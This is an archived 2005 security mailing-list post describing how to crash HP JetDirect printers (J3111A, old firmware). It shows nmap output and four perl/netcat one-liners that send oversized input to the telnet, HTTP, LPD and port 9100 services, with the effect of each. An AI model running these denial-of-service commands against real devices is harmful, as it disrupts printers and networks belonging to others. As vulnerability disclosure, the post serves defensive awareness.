From: Marco Ivaldi (raptor@0xdeadbeef.info)
Date: Fri Dec 02 2005 - 13:50:41 EST
> One other thing I've seen with nCircle (& a few other scanners), if you
> run internally & have any legacy HP jetdirect printers located on your
> network, you may want to check with nCircle to see if their scans still
> lock up those printers.
Actually, it's usually fairly easy to DoS printers, specially if they are
using an old firmware release. Here are a few ways to reproduce some HP
JetDirect vulnerabilities (tested on J3111A, firmware version G.05.35 --
it's quite old, i didn't bother to test newer releases):
root@charon:~# nmap -A x.x.x.x
Interesting ports on printer.mediaservice.pri (x.x.x.x):
(The 1655 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE VERSION
23/tcp open telnet HP JetDirect printer telnetd
80/tcp open http?
515/tcp open printer?
9100/tcp open jetdirect?
Device type: printer|print server
Running: HP embedded
OS details: HP printer w/JetDirect card
1) TELNET. Crash all network services:
root@charon:~# perl -e 'print "ABCD"x666 . "\n"' | nc x.x.x.x 23
2) HTTP. Crash all network services with funny stack dump on paper:
root@charon:~# perl -e 'print "ABCD"x666 . "\n"' | nc x.x.x.x 80
3) PRINTER. The printer switches indefinitely between data recv and ready:
root@charon:~# perl -e 'print "ABCD"x666 . "\n"' | nc x.x.x.x 515
4) JETDIRECT. Prints ABCD... and leaves the printer in "unstable" status:
root@charon:~# perl -e 'print "ABCD"x666 . "\n"' | nc x.x.x.x 9100
Pretty lame, isn't it? In case someone's interested i've scanned the funny
stack dump printed on paper and put it on-line here:
http://www.0xdeadbeef.info/stuff/hp-crash.jpg
Sincerely,
-- Marco Ivaldi Antifork Research, Inc. http://0xdeadbeef.info/ 3B05 C9C5 A2DE C3D7 4233 0394 EF85 2008 DBFD B707 ------------------------------------------------------------------------------ Audit your website security with Acunetix Web Vulnerability Scanner: Hackers are concentrating their efforts on attacking applications on your website. Up to 75% of cyber attacks are launched on shopping carts, forms, login pages, dynamic content etc. Firewalls, SSL and locked-down servers are futile against web application hacking. Check your website for vulnerabilities to SQL injection, Cross site scripting and other web attacks before hackers do! Download Trial at: http://www.securityfocus.com/sponsor/pen-test_050831 -------------------------------------------------------------------------------
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:55:13 EDT